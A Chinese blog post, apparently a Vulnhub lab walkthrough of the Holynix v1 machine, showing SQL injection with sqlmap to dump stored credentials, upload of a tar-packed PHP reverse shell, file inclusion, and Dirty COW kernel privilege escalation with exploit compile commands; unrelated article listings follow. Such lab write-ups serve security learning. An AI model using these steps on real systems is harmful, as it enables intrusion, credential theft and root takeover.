holynix:v1

最新推荐文章于 2024-09-02 16:32:30 发布
最新推荐文章于 2024-09-02 16:32:30 发布
阅读量231 收藏 3
点赞数 6
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140782890
版权

1. 主机发现

2. 端口扫描

3. 目录扫描

4. 漏洞探测

  1. 访问首页

  1. 发现登录页面

  1. 登录框存在SQL注入

  1. 找到用户名和密码,登录
python3 sqlmap.py -r 1.txt --batch --random-agent -D creds -T accounts --dump

  1. 发现有文件上传功能点,尝试上传文件,发现不允许上传,估计是用户权限不够

  1. 用高权限用户etenenbaum登录后上传文件,成功上传,文件上传后去的是transfer.php文件

  1. 开启这个选项,就会自动解压压缩包文件,并保存在用户家目录

  1. http://192.168.236.133/~etenenbaum/

  1. 发现文件包含漏洞

  1. 更改路径,成功包含

  1. 通过文件包含,查看transfer.php文件

  1. 压缩包转换的背后逻辑是用tar xzf解压,那么我们可以用tar czf打包文件,再进行上传
locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .

修改此文件

tar czf shell.tar.gz php-reverse-shell.php

  1. 可以发现自动解压

  1. 监听1234端口,访问php文件,成功反弹shell

5. 提权

  1. 查看内核版本信息,发现是2.6.24版本,可尝试脏牛提权
uname -a

  1. 查找脏牛提权
searchsploit 'Dirty COW'

  1. 将文件拷贝到当前目录
searchsploit -m 40839.c

  1. 开启web服务,在shell终端下载当前文件

  1. 编译
gcc -pthread 40839.c -o 40839 -lcrypt

  1. 运行编译后的文件,输入密码

  1. 切换新用户firefart,发现失败

  1. 使用Python提高交互性,然后切换用户,脏牛提权成功
 python -c "import pty;pty.spawn('/bin/bash')"

  1. 记得将备份文件移回去
mv /tmp/passwd.bak /etc/passwd

花椒椒椒
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Atlas:undefined reference to `std::experimental::filesystem::v1::__cxx11::path::_M_split_cmpts()
mazhanIMP的博客
12-13 6020
Atlas开发中添加文件检测有无
Kubernetes--Pod管理与配置apiVersion: v1kind: ConfigMapmetadata: name: cm-appvarsdata: apploglevel:
GaoChuang_的博客
11-07 1985
一、Pod的配置管理 应用部署的最佳实践就是将应用所需的配置信息与程序分离,这样应用程序可以更好的被复用,通过不同配置可以实现更好的功能。将应用程序打包成容器镜像后,可以通过环境变量或者外挂文件的方式在创建容器时进行配置注入,但在大规模容器环境中,对多个容器进行不同配置将变得非常复杂,K8S在1.2版本提供了一种统一配置管理方案---ConfigMap。 1.ConfigMap概述 ConfigMap供容器使用的典型用法: (1) 生成容器内的环境变量 ...
HOLYNIX: V1
Mysmycbx的博客
03-18 322
holynix
HOLYNIX: V1靶机
weixin_71232352的博客
07-12 290
【代码】HOLYNIX: V1靶机。
红队打靶练习:HOLYNIX: V1
分享
01-13 663
红队打靶练习:HOLYNIX: V1,很简单!只能说!
Holynix:V1靶机
m0_65285254的博客
07-30 168
用户登录框存在sql注入,以POST方式提交,参数在请求数据中,将请求数据包保存到txt文件中,使用sqlmap爆破用户账号密码。修改后缀名,tar czf shell.tar.gz php-reverse-shell.php。打开文件上传位置,etenenbaum家目录 发现上传的文件解析不了。使用kali上的nmap工具进行端口扫描,找到目标ip地址。不断登录账号,发现账号etenenbaum拥有上传文件权限。自动解析为shell.php文件,kali监听。编辑文件,修改为kali的ip。
android重新打包工具:v1+v2
06-08
android重新打包工具:v1+v2
APK 签名:v1 v2 v3 v4
热门推荐
weixin_46569059的博客
09-15 1万+
通过对 Apk 进行签名,开发者可以证明对 Apk 的所有权和控制权,可用于安装和更新其应用。而在 Android 设备上的安装 Apk ,如果是一个没有被签名的 Apk,则会被拒绝安装。 在安装 Apk 的时候,软件包管理器也会验证 Apk 是否已经被正确签名,并且通过签名证书和数据摘要验证是否合法没有被篡改。只有确认安全无篡改的情况下,才允许安装在设备上。 简单来说,APK 的签名主要作用有两个: 证明 APK 的所有者。 允许 Android 市场和设备校验 APK 的正确性。
V1.Emissary:V1.Emissary 是 VersionOne 和其他应用程序之间的管道。 事件基于 VersionOne 的 RSS 源触发
06-07
V1.使者 V1.Emissary 是 VersionOne 和其他应用程序之间的管道。 事件是基于 VersionOne 的 RSS 源触发的。 华夫板 本项目使用 waffle.io 跟踪 github 问题: ://waffle.io/mlaguren/v1.emissary 入门 请访问维基...
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 1517
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
NTFS安全权限和文件共享
m0_64139836的博客
08-28 434
FAT32和exFAT支持单个文件不超过4G的文件;
【网络安全】服务基础第一阶段——第五节:Windows系统管理基础---- DHCP部署与安全
goldfish8848的博客
08-29 916
DHCP服务器不仅可以⾃动分配IP地址给⽹络中的设备,还可以进⾏⾼级的管理和配置,以确保⽹络的⾼效运⾏和安全。下⾯是⼀些关键的管理策略和操作步骤:1. 设置地址池(Scope Configuration)DHCP服务器通过所谓的“作⽤域”来管理IP地址池。每个作⽤域定义了⼀系列的IP地址,这些地址可以⾃动分配给⽹络中的客户端。
【软件逆向】第27课,软件逆向安全工程师之(二)寄存器寻址,每天5分钟学习逆向吧!
DvlpNews
09-02 421
寄存器寻址是汇编语言中的一种寻址方式,在这种方式中,操作数位于CPU的寄存器中。寄存器是CPU内部的高速存储位置,用于快速访问数据。
医院建筑的电气设计——保障医疗质量与安全的坚固基石
acrel002的博客
08-28 556
特别是那些与患者生命息息相关的1、2类场所,如急诊抢救室、手术室、重症监护室等,其供电系统更是被赋予了“特别重要负荷”的标签,要求在极短的时间内恢复供电,以确保医疗活动的连续性和患者的安全。随着一批批新建医院及既有医院的华丽蜕变,从社区医院到综合医院,再到医疗城、医疗集聚区的崛起,不仅彰显了政府对民生健康的深切关怀,也预示着我国医疗体系正迈向智能化、高效化的新时代。医院,作为生命与健康的守护者,其内部布满了各式各样的精密医疗设备与电子仪器,这些设备的稳定运行高度依赖于稳定、可靠的电力供应。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 682
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
【网络安全】服务基础第一阶段——第六节:Windows系统管理基础---- DNS部署与安全
goldfish8848的博客
08-29 983
简单来说,⼀条域名的DNS记录会在本地有两种缓存:浏览器缓存和操作系统(OS)缓存。在浏览器中访问的时候,会优先访问浏览器缓存,如果未命中则访问OS缓存,最后再访问DNS服务器(⼀般是ISP提供),然后DNS服务器会递归式的查找域名记录,然后返回。DNS记录会有⼀个ttl值(time to live),单位是秒,意思是这个记录最⼤有效期是多少。经过实验,OS缓存会参考ttl值,但是不完全等于ttl值,⽽浏览器DNS缓存的时间跟ttl值⽆关,每种浏览器都使⽤⼀个固定值。
突发性网络攻击的安全挑战分析
persist213的博客
08-28 589
根据学者的统计,美国主要媒体对突发性网络攻击 ( 尤其是“网络珍珠港”) 的报道于 2011-继 2010 年遭受震网病毒攻击之后,伊朗在 2018 年又一次受到了震网病毒的攻击,并且攻击的严。2013 年之间呈飙升的趋势,而这正是因为伊朗对美国和其波斯湾盟国进行了一系列的网络攻击,正是鉴于这样一种权衡,美国的安全战略才不断地强调对突发性网络攻击的预防。网络战争的新兴形式,对于世界来说仍是国家安全领域的新问题,对网络安全治理带来了不可忽视。根据目前的世界格局,国与国之间的军事实力是完全不对称的,尤其。
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
最新发布
09-02
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
docker build -t yolov8:v1 .
07-09
`docker build`命令用于从Dockerfile构建一个新的镜像。在这个命令中,`-t`选项用于指定新创建的镜像的名称和标签(这里是`yolov8:v1`),`.`表示当前目录作为Dockerfile的位置。 具体来说,当你运行`docker build -t yolov8:v1 .`时,Docker会执行以下步骤[^4]: 1. **查找Dockerfile**:它会在当前目录(`.`)下寻找名为`Dockerfile`的文件,这是定义镜像构建过程的基础。 2. **读取Dockerfile**:这个文本文件包含了指令序列,指示如何安装依赖项、配置环境、复制文件等来创建最终的镜像。 3. **构建镜像**:按照Dockerfile中的指令逐条执行,最后生成一个新的Docker镜像,其基础镜像是`yolov8`,标签为`v1`。 4. **命名并注册镜像**:如果成功构建完成,新的镜像就会以指定的名称和标签的形式存在本地仓库中,可以使用`docker images`命令查看。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值